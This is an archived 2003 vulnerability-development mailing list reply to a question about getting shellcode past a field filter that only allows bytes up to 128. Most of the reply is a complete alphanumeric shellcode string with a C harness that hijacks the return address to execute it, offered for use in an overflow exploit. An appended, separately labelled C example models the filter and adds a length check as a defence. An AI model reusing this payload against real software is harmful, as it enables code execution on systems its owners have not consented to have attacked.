Vulnerability Development mailing list archives
Re: shellcode with standard characters
From: steve () uk intasys com
Date: Thu, 12 Jun 2003 23:48:29 +0100
On Thu, Jun 12, 2003 at 11:20:00AM +0200, JohnnyRun wrote:
> This is my first post and I'm looking for some documentation. A friend of mine has produced a segfault with a malloc vulnerability on an application.
> We would like to produce something more interesting. The field overflowed can accept only characters between 0 and 128. Any other character is replaced with a whitespace. Can we inject shellcode with only these characters available? Can you suggest documentation about shellcode writing?

The simplest thing to do is to write a simple program that will run a shell in C, and generate the assembly output for it with GCC -s, this will give you a starting point. After that you must filter out the opcodes and values which contain invalid characters. Using add's etc will save you some effort.

Here's a simple sample:

char shellcode[] =
  "DDDDTYTX3H01H01h03h0LLLLLLLLXPY3E01E01u03u0j0fXh8eshXf5VJPfhbi"
  "fhDefXf5AJfPDTYhKATYX5KATYPQTUX3H01H01X03X0YRX3E01E03U0Jfh2GfX"
  "f3E0f1E0f1U0fh88fX0E1f1E0f3E0fPTRX49HHHQfPfYRX2E00E0BRX0E02E02"
  "L0z0L0zYRX4j4aGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGG"
  "GGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGG"
  "GGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGG"
  "GGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGG";

int main()
{
  int *ret;
  ret = (int *)&ret + 2;
  (*ret) = (int)shellcode;
  return 0;
}

Steve
--
Steve Kemp <steve () uk intasys com>
Intasys Billing Technologies Ltd
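
An added illustration, not part of the original post or thread: the C sketch below models the character filter described in the question and shows that input built only from accepted bytes passes through it untouched, so the filter does not stop the overflow, while a length check does. The function names, the 64-byte capacity and the sample input are assumptions made for the example.

```c
#include <stddef.h>
#include <stdio.h>
#include <string.h>

#define FIELD_MAX_BYTE 128  /* highest byte value the field accepts, per the post */
#define FIELD_CAPACITY 64   /* hypothetical size of the destination buffer */

/* Model of the filter from the question: any byte above FIELD_MAX_BYTE
 * becomes a space. Returns the number of bytes that were replaced. */
size_t filter_field(unsigned char *buf, size_t len)
{
    size_t replaced = 0;
    for (size_t i = 0; i < len; i++) {
        if (buf[i] > FIELD_MAX_BYTE) {
            buf[i] = ' ';
            replaced++;
        }
    }
    return replaced;
}

/* The check that addresses the bug class: reject input that does not
 * fit, terminator included. Returns 0 on success, -1 when rejected. */
int store_field(char dst[FIELD_CAPACITY], const unsigned char *src, size_t len)
{
    if (len >= FIELD_CAPACITY)
        return -1;
    memcpy(dst, src, len);
    dst[len] = '\0';
    return 0;
}

/* Constructed sample input: up to 200 printable letters, no payload. */
size_t make_sample(unsigned char *out, size_t cap)
{
    size_t n = cap < 200 ? cap : 200;
    for (size_t i = 0; i < n; i++)
        out[i] = (unsigned char)('A' + (i % 26));
    return n;
}

int main(void)
{
    unsigned char in[256];
    char field[FIELD_CAPACITY];
    size_t n = make_sample(in, sizeof in);
    printf("bytes altered by filter: %zu of %zu\n", filter_field(in, n), n);
    printf("store_field result: %d\n", store_field(field, in, n));
    return 0;
}
```
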